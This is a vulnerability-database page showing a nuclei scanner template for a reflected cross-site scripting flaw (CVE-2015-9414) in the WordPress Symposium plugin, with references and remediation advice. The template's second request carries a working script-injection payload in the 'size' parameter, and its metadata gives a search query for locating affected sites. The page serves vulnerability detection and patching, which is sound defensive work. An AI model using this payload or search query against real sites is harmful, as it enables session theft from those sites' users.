Lucene search
K

WordPress Symposium <=15.8.1 - Cross-Site Scripting

🗓️ 28 Jun 2026 03:02:45Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 37 Views

WordPress Symposium <=15.8.1 Cross-Site Scripting via get_album_item.php?size parameter allows cookie-based authentication credentials theft and other attacks. Update to >=15.8.2

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2015-9414
26 Sep 201909:01
circl
CNVD
WordPress wp-symposium plugin cross-site scripting vulnerability
29 Sep 201900:00
cnvd
CVE
CVE-2015-9414
25 Sep 201923:27
cve
Cvelist
CVE-2015-9414
25 Sep 201923:27
cvelist
EUVD
EUVD-2015-9254
7 Oct 202500:30
euvd
NVD
CVE-2015-9414
26 Sep 201900:15
nvd
Prion
Code injection
26 Sep 201900:15
prion
RedhatCVE
CVE-2015-9414
22 May 202506:51
redhatcve
wpexploit
WP Symposium <= 15.8.1 - Unauthenticated Reflected Cross-Site Scripting (XSS)
6 Sep 201500:00
wpexploit
WPVulnDB
WP Symposium <= 15.8.1 - Unauthenticated Reflected Cross-Site Scripting (XSS)
6 Sep 201500:00
wpvulndb
Rows per page
id: CVE-2015-9414

info:
  name: WordPress Symposium <=15.8.1 - Cross-Site Scripting
  author: daffainfo
  severity: medium
  description: WordPress Symposium through 15.8.1 contains a reflected cross-site scripting vulnerability via the wp-content/plugins/wp-symposium/get_album_item.php?size parameter which allows an attacker to steal cookie-based authentication credentials and launch other attacks.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft or unauthorized actions.
  remediation: |
    Update to the latest version of the WordPress Symposium plugin (>=15.8.2) which includes a fix for this vulnerability.
  reference:
    - https://wpscan.com/vulnerability/2ac2d43f-bf3f-4831-9585-5c5484051095
    - https://wpvulndb.com/vulnerabilities/8175
    - https://wordpress.org/plugins/wp-symposium/#developers
    - https://nvd.nist.gov/vuln/detail/CVE-2015-9414
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2015-9414
    cwe-id: CWE-79
    epss-score: 0.03605
    epss-percentile: 0.88032
    cpe: cpe:2.3:a:wpsymposiumpro:wp-symposium:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 2
    vendor: wpsymposiumpro
    product: "wp-symposium"
    framework: wordpress
    google-query: "inurl:\"/wp-content/plugins/wp-symposium\""
  tags: cve2015,cve,xss,wpscan,wordpress,wp-plugin,wpsymposiumpro,vuln
flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /wp-content/plugins/wp-symposium/readme.txt HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        internal: true
        words:
          - 'WP Symposium'
          - 'Tags:'
        condition: and

  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/wp-symposium/get_album_item.php?size=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '</script><script>alert(document.domain)</script>'

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100a37f2dad9ab7466db41be9aec65e9c2c03df332caa10ecf051685219c828610302210083fa088a84e7fb49ad00093682ffc97fe3940d59065c618bc5dec3656681acc5:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.2Medium risk
Vulners AI Score6.2
CVSS 24.3
CVSS 3.16.1
EPSS0.03605
37